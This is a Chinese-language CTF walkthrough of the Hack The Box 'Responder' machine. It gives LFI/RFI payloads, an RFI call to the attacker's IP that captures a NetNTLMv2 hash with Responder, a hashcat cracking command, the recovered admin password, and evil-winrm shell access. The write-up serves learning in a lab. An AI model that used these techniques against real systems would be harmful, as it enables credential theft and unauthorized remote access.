You need to walk before you can run
(目前为止完成时间最长的靶机,主要是扫描和爆破比较费时间)
TASK 1 How many TCP ports are open on the machine?
靶机中开放的TCP端口数量为:3
nmap -A -p1-65535 10.129.34.77
PS:这里由于校园网WAF的限制,所以7680端口无法直接扫描出来
TASK 2 When visiting the web service using the IP address, what is the domain that we are being redirected to?
当直接访问靶机IP时,被重定向到了:unika.htb
TASK 3 Which scripting language is being used on the server to generate webpages?
靶机网页使用的语言是:PHP
打开BP抓个包,即可得到答案
TASK 4 What is the name of the URL parameter which is used to load different language versions of the webpage?
用于加载不同语言的URL参数是:page
首先修改hosts文件禁止页面跳转,编辑/etc/hosts,添加IP地址和跳转地址,之后发现靶机IP可以正常访问
接着点修改语言(右上角EN),发现URL中的参数page
TASK 5 Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”
选择题,可以进行本地文件包含的是:../../../../../../../../windows/system32/drivers/etc/hosts
TASK 6 Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”
同选择题,可以进行远程文件包含的是://10.10.14.6/somefile
TASK 7 What does NTLM stand for?
NTLM的全称是:New Technology LAN Manager
TASK 8 Which flag do we use in the Responder utility to specify the network interface?
responder中能指定网络接口的参数:-I(杠艾)
TASK 9 There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?.
john的全称是:john the ripper(用来爆破NTLM哈希的工具)
TASK 10 What is the password for the administrator user?
管理员账户的密码是:badminton
1、启动responder监听本地的tun0网卡:responder -I tun0
2、由于靶机存在远程文件包含漏洞,所以利用本机IP进行RFI:?page=//10.10.16.82/1.txt
3、成功RFI后查看responder,得到返回的哈希值
4、利用hashcat进行爆破,得到管理员密码:hashcat -m 5600 -a 3 responder.txt rockyou.txt
TASK 11 We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
使用我们恢复的密码远程访问 Responder的Windows 服务监听的端口是:5985
Submit root flag
利用evil-winrm直接getshell,在mike账户desktop下面找到flag